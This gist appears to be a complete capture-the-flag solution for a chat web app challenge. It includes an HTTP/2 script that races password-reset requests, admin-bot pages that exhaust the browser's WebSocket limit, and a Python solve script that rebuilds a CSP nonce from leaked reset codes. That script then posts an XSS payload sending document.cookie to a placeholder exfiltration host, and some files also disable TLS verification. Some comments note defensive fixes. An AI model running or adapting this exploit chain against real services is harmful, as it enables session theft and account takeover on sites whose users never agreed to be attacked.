@strellic
Last active April 14, 2024 21:49
plaid24 werechat sol
// http2 muxer to race reset passcode
// h2spam.js <base url> <username>: opens ONE HTTP/2 session to argv[2] and
// multiplexes five POST /api/request-reset bodies for argv[3] onto it as
// separate streams, so the server sees the burst on a single connection.
// Defender's view: the reset flow must stay correct under concurrent requests
// for the same account (serialize or make code issuance idempotent per user),
// and several identical reset requests for one username within milliseconds
// is itself a clear detection signal for rate-limiting/alerting.
const http2 = require('http2');
// Disables TLS certificate verification for the whole process — a throwaway
// lab shortcut, never acceptable in client code that talks to real services.
process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
const clientSession = http2.connect(process.argv[2]);
for (let i = 0; i < 5; i++) {
    const r = clientSession.request({
        ":method": "POST",
        ":path": "/api/request-reset",
        "content-type": "application/json"
    });
    r.write(JSON.stringify({ username: process.argv[3] }), 'utf-8');
    r.on('response', (headers, flags) => {
        // `let i` gives every iteration its own binding, so the logged index is the
        // stream that actually produced the chunk.
        r.on('data', (chunk) => {
            console.log(`Body for request`, i, `${chunk}`);
        });
    });
    r.end();
}
clientSession.on('error', (err) => {
    console.error('HTTP/2 Client Session Error:', err);
});
// No explicit session close: the process is simply killed after 5 s, whether or
// not all five responses have arrived.
setTimeout(() => process.exit(), 5000);
<!DOCTYPE html>
<html>
<!-- lol.html: the page handed to the admin bot (see solve.py). It opens
     lol2.html in a second tab, waits a fixed 47 s, then navigates this tab to
     TARGET/chat. The two tabs never signal each other; the timing is assumed. -->
<body>
<script>
// Target origin comes from ?target=...; falls back to a local dev server.
const TARGET = (new URLSearchParams(location.search)).get("target") || "http://localhost:3000";
const sleep = ms => new Promise(r => setTimeout(r, ms));
// waits for lol2.html to fill 256 websockets, then redirects to TARGET/chat
window.onload = async () => {
    // Second tab on this same origin does the socket filling.
    window.open("lol2.html");
    // Must match the 47_000 ms sleep in lol2.html; there is no handshake.
    await sleep(47_000);
    // Beacon to the exploit server — presumably just a progress marker for the
    // operator watching the logs.
    navigator.sendBeacon("/opening_chat");
    // NOTE(review): relies on TARGET/chat behaving differently once the
    // browser's WebSocket limit is exhausted — confirm against the server.
    location.href = `${TARGET}/chat`;
}
</script>
</body>
<!DOCTYPE html>
<html>
<!-- lol2.html: opened by lol.html. Holds the admin bot's browser at its
     per-profile WebSocket connection limit for ~78 s, then navigates away.
     Hostnames below (other-site-that-makes-one-ws-connection, *.WS_SLEEP) are
     placeholders to be filled in by the operator. -->
<body>
<script>
const sleep = ms => new Promise(r => setTimeout(r, ms));
// Assumed per-browser WebSocket limit; a few extra are opened below to be safe.
const SOCKET_LIMIT = 256;
// One distinct host per socket; the name suggests a server that simply holds
// the connection open (not shown here).
const WS_SLEEP_SERVER = i => `ws://${i}.WS_SLEEP`;
// Embeds a third-party page that is expected to open exactly one WebSocket.
const iframeWs = () => {
    let i = document.createElement('iframe')
    i.src=`http://other-site-that-makes-one-ws-connection`
    document.body.append(i)
    return i
}
window.onload = async () => {
    // fill up 256 websockets
    // + a couple more for good measure
    iframeWs();
    for (let i = 0; i < SOCKET_LIMIT + 10; i++) {
        // `x` is never declared, so this is an implicit global overwritten each
        // iteration; the sockets stay alive because the browser holds them, not
        // because of this reference.
        x = new WebSocket(WS_SLEEP_SERVER(i));
    }
    // First window: lol.html is navigating to /chat at the 47 s mark.
    await sleep(47_000);
    // other tab now navigates to /chat
    // 31 seconds to get email codess
    await sleep(31_000);
    // Progress marker to the exploit server, then leave the page — presumably
    // so the browser releases all of the sockets opened above.
    navigator.sendBeacon("/unblocking");
    location = "about:blank";
}
</script>
</body>
# main solve script
# Orchestrates the whole chain: register + log in, hand the exploit page to the
# admin bot, burst the password-reset endpoint, turn the emailed codes into a
# nonce and websocket session id, create a room via ws.py, then post a chat
# message carrying an inline script tagged with that nonce.
import requests
import time
import aiohttp
import asyncio
from websockets.sync.client import connect
import json
import os
import sys

# argv[1] = challenge base URL, argv[2] = admin-bot base URL; trailing '/' stripped.
TARGET = sys.argv[1]
TARGET_ADMINBOT = sys.argv[2]
if TARGET.endswith("/"):
    TARGET = TARGET[:-1]
if TARGET_ADMINBOT.endswith("/"):
    TARGET_ADMINBOT = TARGET_ADMINBOT[:-1]
# http(s):// -> ws(s):// for the websocket endpoint.
TARGET_WS = TARGET.replace("https", "wss").replace('http', 'ws')
# URL the admin bot is told to visit; the same as TARGET in this setup.
TARGET_INTERNAL = TARGET
# Mailbox that receives the reset codes; they are read by hand (see the
# get_input prompts in main).
EMAIL = '5fa0de06-3817-4649-9305-9bd7cd99d2aa@email.webhook.site'
USERNAME = 'strell'
# EXPLOIT_URL / EXFIL_URL hosts are placeholders for the operator to fill in.
EXPLOIT_URL = 'http://EXPLOIT_URL/lol.html'
EXFIL = 'http://EXFIL_URL/flag?flag='
# Number of concurrent reset requests in the HTTP/1 path (see main).
N = 15
# Best-effort removal of the file ws.py writes the room id into.
# NOTE(review): a bare except also swallows KeyboardInterrupt/SystemExit;
# `except FileNotFoundError:` (or contextlib.suppress) is the narrower form.
try:
    os.unlink("room_id.txt")
except:
    pass
async def bruh(
    session: aiohttp.ClientSession,
    **kwargs
) -> None:
    """Send one POST /api/request-reset for USERNAME on *session* and print the body.

    Extra *kwargs* go straight to ``session.request``. Nothing is returned;
    ``main`` gathers N of these so the requests land on the server as a burst.
    """
    r = await session.request('POST', url=f'{TARGET}/api/request-reset', json={ "username": USERNAME }, **kwargs)
    print(await r.text())
async def main():
    """Run the solve chain end to end; interactive (prompts for the emailed codes).

    Order of operations: register and log in as USERNAME; submit EXPLOIT_URL to
    the admin bot; wait 60 s for the bot's tabs (lol.html / lol2.html) to do
    their work; burst /api/request-reset (h2spam.js over HTTP/2 for https
    targets, N concurrent aiohttp requests otherwise); read three 12-char codes
    from the operator; derive ``nonce`` and ``ws_session`` from them; create a
    room through ws.py; then loop forever posting a message whose content is an
    ``<iframe srcdoc>`` with a script tagged with that nonce that sends
    ``document.cookie`` to EXFIL.

    Never returns normally: the final ``while True`` has no exit.
    """
    # Defender's view of what this chain depends on (inferred from the payload
    # below — confirm against the server): (1) reset-code issuance that is not
    # safe under concurrent requests, (2) a CSP script nonce and a ws session id
    # that can be reconstructed from values mailed to the user, (3) chat content
    # rendered as raw HTML, (4) a session cookie readable from JavaScript. The
    # fixes map 1:1 — serialize or make reset issuance idempotent per account,
    # draw every secret independently from a CSPRNG, HTML-encode or sanitize
    # message content, and set HttpOnly on the session cookie.
    s = requests.Session()
    # Registration uses a fixed invite code; password == username for the throwaway account.
    print(s.post(f'{TARGET}/api/register', json={
        'inviteCode': 'every_wolf_needs_a_pack',
        'username': USERNAME,
        'email': EMAIL,
        'password': USERNAME
    }).text)
    r = s.post(f'{TARGET}/api/login', json={
        'username': USERNAME,
        'password': USERNAME
    })
    print(r.text)
    # Session cookie is reused later for the websocket connections (ws.py and below).
    session_token = r.cookies.get('session')
    print('session token', session_token)
    s.post(f'{TARGET_ADMINBOT}/visit', json={
        'url': f'{EXPLOIT_URL}?target={TARGET_INTERNAL}'
    })
    # Fixed wait for the bot's tabs; lol.html navigates to /chat at 47 s.
    time.sleep(60)
    print("resetting...")
    if TARGET.startswith("https:"): # http2: one multiplexed session, see h2spam.js
        # NOTE(review): shell string built from argv; list-form subprocess.run
        # would avoid quoting issues. Blocks until node exits (5 s timer in h2spam.js).
        os.system(f'node h2spam.js "{TARGET}" "{USERNAME}"')
    else:
        # Plain-HTTP path: N concurrent requests on one aiohttp session.
        async with aiohttp.ClientSession() as session:
            tasks = []
            for _ in range(N):
                tasks.append(bruh(session=session))
            await asyncio.gather(*tasks)
    def get_input(prompt):
        """Prompt until a non-empty line is entered (recurses on empty input)."""
        data = input(prompt).strip()
        if len(data) != 0:
            return data
        return get_input(prompt)
    # Operator pastes the three reset codes that arrived at EMAIL; only the
    # first 12 characters of each are used.
    code_1 = get_input('code 1 (K)> ')[:12]
    code_2 = get_input('code 2 (L)> ')[:12]
    code_3 = get_input('code 3 (M)> ')[:12]
    # nonce = all of code 1 + first 4 of code 2 + fixed suffix;
    # ws_session = last 8 of code 2 + first 8 of code 3 + fixed suffix.
    # The 'AAAI' / 'AAAJ' suffixes are hard-coded; their meaning is not visible here.
    nonce = code_1 + code_2[:4] + 'AAAI'
    ws_session = code_2[4:] + code_3[:8] + 'AAAJ'
    #nonce = get_input("nonce: ")
    #ws_session = get_input("ws_session: ")
    # ws.py creates a room over a socket authenticated with ws_session and the
    # session cookie, then writes the room id to room_id.txt. Same shell-string
    # caveat as the node call above.
    os.system(f'python3 ws.py "{TARGET_WS}" "{ws_session}" "{session_token}"')
    # File handle is never closed; `with open(...)` would be cleaner.
    room_id = open('room_id.txt', 'r').read()
    print('room id', room_id)
    # A fresh, server-issued ws session id is used for the message-sending socket.
    new_ws_session = s.post(f'{TARGET}/api/session').json()['id']
    print('new websocket session id', new_ws_session)
    time.sleep(1)
    with connect(f'{TARGET_WS}/api/ws?session={new_ws_session}', additional_headers=[('Cookie', f'session={session_token}')]) as ws:
        # Re-sends the same message once per second until the process is killed;
        # ws.recv() blocks, so if the server sends nothing back the loop stalls there.
        while True:
            time.sleep(1)
            ws.send(json.dumps({
                'kind': 'Message',
                'room': room_id,
                'content': f'<iframe srcdoc="<script nonce=\'{nonce}\'>window.open(`{EXFIL}`+document.cookie)</script>"></iframe>'
            }))
            print(ws.recv())
# Entry point; main() never returns on its own (infinite send loop), so this
# runs until interrupted.
asyncio.run(main())
# sends websocket createroom message then immediately disconnects
# Invoked by solve.py as: ws.py <ws base url> <ws session id> <session cookie>.
# Writes the id of the newly created room to room_id.txt, then drops the TCP
# socket without a WebSocket close handshake.
import ssl
# Monkey-patches ssl's default context factory so certificate verification is
# skipped process-wide — a lab-only shortcut, never acceptable in production code.
ssl._create_default_https_context = ssl._create_unverified_context
from websockets.sync.client import connect
import json
import time
import sys

print(sys.argv)
TARGET = sys.argv[1]
if TARGET.endswith("/"):
    TARGET = TARGET[:-1]
print(TARGET + "/api/ws?session=" + sys.argv[2])
# Authenticates with the session cookie plus a ws session id in the query string.
websocket = connect(TARGET + "/api/ws?session=" + sys.argv[2], additional_headers=[('Cookie', 'session=' + sys.argv[3])])
print('connected!')
time.sleep(1)
websocket.send(json.dumps({"kind":"CreateRoom","name": "x"}))
print('data sent!')
# Assumes the first frame back is the CreateRoom reply carrying data.id —
# confirm against the server; any other frame raises KeyError below.
data = json.loads(websocket.recv())
print('recv', data)
# Handle is never closed explicitly; `with open(...)` would be cleaner.
open("room_id.txt", "w").write(data["data"]["id"])
# Closes the underlying socket directly (no close frame), as the header says.
websocket.socket.close()
exit()